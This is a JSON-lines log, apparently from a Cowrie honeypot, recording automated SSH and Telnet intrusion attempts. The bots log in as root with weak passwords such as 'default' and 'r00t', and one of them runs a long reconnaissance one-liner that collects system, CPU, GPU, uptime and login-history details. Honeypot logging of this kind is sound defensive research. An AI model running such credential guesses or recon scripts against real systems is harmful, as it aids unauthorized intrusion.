{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-09-08T19:28:28.626178Z","src_ip":"212.227.235.229","session":"2329399394d5"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:28:28.626764Z","src_ip":"212.227.235.229","session":"2329399394d5"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:28:28.627356Z","src_ip":"212.227.235.229","session":"2329399394d5"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:28:28.628071Z","src_ip":"212.227.235.229","session":"2329399394d5"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:28:28.628649Z","src_ip":"212.227.235.229","session":"2329399394d5"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-09-08T19:28:28.904598Z","src_ip":"212.227.235.229","session":"2329399394d5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","size":74,"shasum":"d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:28:28.905453Z","src_ip":"212.227.235.229","session":"2329399394d5"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:28:28.906511Z","src_ip":"212.227.235.229","session":"2329399394d5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47127,"dst_ip":"1.2.3.4","dst_port":23,"session":"cb33b3b2568c","protocol":"telnet","message":"New connection: 212.227.125.160:47127 (1.2.3.4:23) [session: cb33b3b2568c]","sensor":"my-vps","timestamp":"2025-09-08T19:29:40.920960Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33538,"dst_ip":"1.2.3.4","dst_port":22,"session":"5fee3c88ef10","protocol":"ssh","message":"New connection: 212.227.235.229:33538 (1.2.3.4:22) [session: 5fee3c88ef10]","sensor":"my-vps","timestamp":"2025-09-08T19:29:51.501905Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T19:29:51.508127Z","src_ip":"212.227.235.229","session":"5fee3c88ef10"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T19:29:51.773897Z","src_ip":"212.227.235.229","session":"5fee3c88ef10"}
{"eventid":"cowrie.login.success","username":"root","password":"default","message":"login attempt [root/default] succeeded","sensor":"my-vps","timestamp":"2025-09-08T19:29:52.945905Z","src_ip":"212.227.235.229","session":"5fee3c88ef10"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T19:29:53.506929Z","src_ip":"212.227.235.229","session":"5fee3c88ef10"}
{"eventid":"cowrie.command.input","input":"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","message":"CMD: export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","sensor":"my-vps","timestamp":"2025-09-08T19:29:53.507588Z","src_ip":"212.227.235.229","session":"5fee3c88ef10"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:29:53.508187Z","src_ip":"212.227.235.229","session":"5fee3c88ef10"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:29:53.509090Z","src_ip":"212.227.235.229","session":"5fee3c88ef10"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-09-08T19:29:53.510396Z","src_ip":"212.227.235.229","session":"5fee3c88ef10"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:29:53.511136Z","src_ip":"212.227.235.229","session":"5fee3c88ef10"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:29:53.511987Z","src_ip":"212.227.235.229","session":"5fee3c88ef10"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-09-08T19:29:53.512941Z","src_ip":"212.227.235.229","session":"5fee3c88ef10"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-09-08T19:29:53.513539Z","src_ip":"212.227.235.229","session":"5fee3c88ef10"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:29:53.513988Z","src_ip":"212.227.235.229","session":"5fee3c88ef10"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:29:53.514556Z","src_ip":"212.227.235.229","session":"5fee3c88ef10"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:29:53.515107Z","src_ip":"212.227.235.229","session":"5fee3c88ef10"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:29:53.515609Z","src_ip":"212.227.235.229","session":"5fee3c88ef10"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-09-08T19:29:53.788137Z","src_ip":"212.227.235.229","session":"5fee3c88ef10"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","size":74,"shasum":"d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:29:53.789217Z","src_ip":"212.227.235.229","session":"5fee3c88ef10"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:29:53.790009Z","src_ip":"212.227.235.229","session":"5fee3c88ef10"}
{"eventid":"cowrie.session.closed","duration":31.336657285690308,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:30:12.257519Z","src_ip":"212.227.125.160","session":"cb33b3b2568c"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":53900,"dst_ip":"1.2.3.4","dst_port":22,"session":"11314eb19884","protocol":"ssh","message":"New connection: 217.72.205.35:53900 (1.2.3.4:22) [session: 11314eb19884]","sensor":"my-vps","timestamp":"2025-09-08T19:30:24.053558Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:30:24.054635Z","src_ip":"217.72.205.35","session":"11314eb19884"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":6100,"dst_ip":"1.2.3.4","dst_port":22,"session":"e758d366bb80","protocol":"ssh","message":"New connection: 212.227.125.160:6100 (1.2.3.4:22) [session: e758d366bb80]","sensor":"my-vps","timestamp":"2025-09-08T19:31:16.227865Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OPENSSH_7.9","message":"Remote SSH version: SSH-2.0-OPENSSH_7.9","sensor":"my-vps","timestamp":"2025-09-08T19:31:16.269695Z","src_ip":"212.227.125.160","session":"e758d366bb80"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-09-08T19:31:16.312550Z","src_ip":"212.227.125.160","session":"e758d366bb80"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44558,"dst_ip":"1.2.3.4","dst_port":22,"session":"61fbb593a074","protocol":"ssh","message":"New connection: 212.227.235.229:44558 (1.2.3.4:22) [session: 61fbb593a074]","sensor":"my-vps","timestamp":"2025-09-08T19:31:17.007458Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T19:31:17.038461Z","src_ip":"212.227.235.229","session":"61fbb593a074"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-09-08T19:31:17.239826Z","src_ip":"212.227.125.160","session":"e758d366bb80"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:31:17.241338Z","src_ip":"212.227.125.160","session":"e758d366bb80"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T19:31:17.302457Z","src_ip":"212.227.235.229","session":"61fbb593a074"}
{"eventid":"cowrie.login.success","username":"root","password":"r00t","message":"login attempt [root/r00t] succeeded","sensor":"my-vps","timestamp":"2025-09-08T19:31:18.544886Z","src_ip":"212.227.235.229","session":"61fbb593a074"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T19:31:19.204179Z","src_ip":"212.227.235.229","session":"61fbb593a074"}
{"eventid":"cowrie.command.input","input":"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","message":"CMD: export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","sensor":"my-vps","timestamp":"2025-09-08T19:31:19.205004Z","src_ip":"212.227.235.229","session":"61fbb593a074"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:31:19.205770Z","src_ip":"212.227.235.229","session":"61fbb593a074"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:31:19.206953Z","src_ip":"212.227.235.229","session":"61fbb593a074"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-09-08T19:31:19.208375Z","src_ip":"212.227.235.229","session":"61fbb593a074"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:31:19.209568Z","src_ip":"212.227.235.229","session":"61fbb593a074"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:31:19.210577Z","src_ip":"212.227.235.229","session":"61fbb593a074"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-09-08T19:31:19.212104Z","src_ip":"212.227.235.229","session":"61fbb593a074"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-09-08T19:31:19.212765Z","src_ip":"212.227.235.229","session":"61fbb593a074"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:31:19.213348Z","src_ip":"212.227.235.229","session":"61fbb593a074"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:31:19.213971Z","src_ip":"212.227.235.229","session":"61fbb593a074"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:31:19.214766Z","src_ip":"212.227.235.229","session":"61fbb593a074"}
